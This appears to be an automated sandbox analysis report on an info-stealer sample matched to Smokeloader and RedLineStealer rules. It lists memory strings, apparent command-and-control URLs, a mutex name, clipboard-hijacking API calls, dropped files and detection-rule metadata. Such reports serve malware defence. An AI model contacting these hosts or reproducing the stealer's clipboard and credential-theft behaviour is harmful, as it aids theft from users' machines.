Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: 2889.tmp.exe, 00000003.00000003.1401432420.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1401607020.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1402733891.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 2889.tmp.exe, 00000003.00000003.1401432420.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1401607020.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1402733891.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 2889.tmp.exe, 00000003.00000003.1401432420.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1401607020.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1402733891.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.0000000000803000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.coNu5
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: 2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.0000000000803000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: b0cQukXPAl.exe, 00000000.00000002.3754266526.0000000000633000.00000004.00000020.00020000.00000000.sdmp, b0cQukXPAl.exe, 00000000.00000003.3623729070.0000000000633000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/
Source: b0cQukXPAl.exe	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: b0cQukXPAl.exe, 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
Source: b0cQukXPAl.exe, 00000000.00000003.3623729070.0000000000633000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
Source: 2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.0000000000803000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.yru
Source: 2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.0000000000803000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: 2889.tmp.exe, 00000003.00000003.1364088273.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1364309494.00000000007CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://skidjazzyric.click/api
Source: 2889.tmp.exe, 00000003.00000003.1364127657.00000000007A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soundtappysk.shop/
Source: 2889.tmp.exe, 00000003.00000003.1364127657.00000000007A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soundtappysk.shop/(
Source: 2889.tmp.exe, 00000003.00000003.1364127657.00000000007A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soundtappysk.shop/api
Source: 2889.tmp.exe, 00000003.00000003.1364127657.00000000007A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soundtappysk.shop/p
Source: 2889.tmp.exe, 00000003.00000003.1364127657.00000000007A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soundtappysk.shop/x
Source: 2889.tmp.exe, 00000003.00000003.1364088273.00000000007D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://soundtappysk.shop:443/api
Source: 2889.tmp.exe, 00000003.00000003.1588592421.000000000083C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/
Source: 2889.tmp.exe, 00000003.00000002.1792386987.0000000000799000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.000000000082A000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.000000000082A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/api
Source: 2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/tps:fu
Source: 2889.tmp.exe, 00000003.00000003.1588078891.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1588859949.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1588419672.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com:443/api
Source: 2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.0000000000803000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.6u-
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 2889.tmp.exe, 00000003.00000002.1791928964.000000000019A000.00000004.00000010.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.00000000007CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1388965802.00000000007CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1400180810.0000000000803000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steamp
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 2889.tmp.exe, 00000003.00000003.1571581901.0000000003148000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 2889.tmp.exe, 00000003.00000003.1571581901.0000000003148000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 2889.tmp.exe, 00000003.00000003.1401432420.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1401607020.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1402733891.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 2889.tmp.exe, 00000003.00000003.1401432420.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1401607020.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, 2889.tmp.exe, 00000003.00000003.1402733891.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: 2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: 2889.tmp.exe, 00000003.00000003.1400180810.0000000000803000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcuul
Source: 2889.tmp.exe, 00000003.00000003.1571581901.0000000003148000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
Source: 2889.tmp.exe, 00000003.00000003.1571581901.0000000003148000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
Source: 2889.tmp.exe, 00000003.00000003.1571581901.0000000003148000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 2889.tmp.exe, 00000003.00000003.1571581901.0000000003148000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 2889.tmp.exe, 00000003.00000003.1571581901.0000000003148000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 2889.tmp.exe, 00000003.00000003.1388925597.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 2889.tmp.exe, 00000003.00000003.1388965802.0000000000805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443

Source: unknown	HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.10:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.10:49887 version: TLS 1.2

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,

0_2_004016DF

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_004016DF
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_020F1942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_020F1942

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

0_2_004016DF

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.3754052818.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.1792085926.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_020F2357 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,		0_2_020F2357
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_020F25FB NtdllDefWindowProc_W,PostQuitMessage,		0_2_020F25FB

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_00428012	0_2_00428012
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_004071A1	0_2_004071A1
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_004373C9	0_2_004373C9
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_00427474	0_2_00427474
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_0042D4DE	0_2_0042D4DE
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_00428550	0_2_00428550
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_0043D668	0_2_0043D668
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_0041669F	0_2_0041669F
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_00413715	0_2_00413715
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_004277E6	0_2_004277E6
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_00446863	0_2_00446863
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_0040E96A	0_2_0040E96A
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_0042EAD0	0_2_0042EAD0
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_00427A90	0_2_00427A90
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_00418A9F	0_2_00418A9F
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_00436CAF	0_2_00436CAF
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_00427D57	0_2_00427D57
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_00413EFB	0_2_00413EFB
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_02118279	0_2_02118279
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_0211ED37	0_2_0211ED37
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_02104162	0_2_02104162
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_021176DB	0_2_021176DB
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_0211D745	0_2_0211D745
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_021187B7	0_2_021187B7
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_02117A4D	0_2_02117A4D
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_020FEBD1	0_2_020FEBD1
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_02106906	0_2_02106906
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_0210397C	0_2_0210397C
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_02126F16	0_2_02126F16
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_02117FBE	0_2_02117FBE
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_02117CF7	0_2_02117CF7
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_02108D06	0_2_02108D06
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: 0_2_0211ED37	0_2_0211ED37
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268
Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe	Code function: 3_3_0083D268	3_3_0083D268

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\ScreenUpdateSync[1].exe 9185B7955FDBFCE261DFB295163DD00A8AE71D77F28F675CF4E5C14017281575
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\2889.tmp.exe 9185B7955FDBFCE261DFB295163DD00A8AE71D77F28F675CF4E5C14017281575

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: String function: 02100977 appears 53 times
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: String function: 00410710 appears 53 times
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: String function: 0210000F appears 121 times
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: String function: 0040FDA8 appears 125 times
Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Code function: String function: 0040F8F9 appears 36 times

Source: C:\Users\user\AppData\Local\Temp\2889.tmp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7940 -s 1852

Source: b0cQukXPAl.exe	Binary or memory string: OriginalFileName vs b0cQukXPAl.exe
Source: b0cQukXPAl.exe, 00000000.00000000.1303938815.000000000045A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesOrehinal4 vs b0cQukXPAl.exe
Source: b0cQukXPAl.exe, 00000000.00000003.1348745267.0000000003468000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesOrehinal4 vs b0cQukXPAl.exe
Source: b0cQukXPAl.exe, 00000000.00000003.1312555836.0000000002160000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs b0cQukXPAl.exe
Source: b0cQukXPAl.exe, 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs b0cQukXPAl.exe
Source: b0cQukXPAl.exe, 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs b0cQukXPAl.exe
Source: b0cQukXPAl.exe	Binary or memory string: OriginalFilenamesOrehinal4 vs b0cQukXPAl.exe

Source: b0cQukXPAl.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000003.00000002.1792306681.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.3754052818.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.1792085926.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: b0cQukXPAl.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 2889.tmp.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/7@13/4

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

Code function: 0_2_005607A6 CreateToolhelp32Snapshot,Module32First,

0_2_005607A6

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\track_prt[1].htm

Jump to behavior

Source: C:\Users\user\Desktop\b0cQukXPAl.exe	Mutant created: \Sessions\1\BaseNamedObjects\5h48t4j4t1rr
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7940

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

File created: C:\Users\user\AppData\Local\Temp\2889.tmp

Jump to behavior

Source: b0cQukXPAl.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\b0cQukXPAl.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

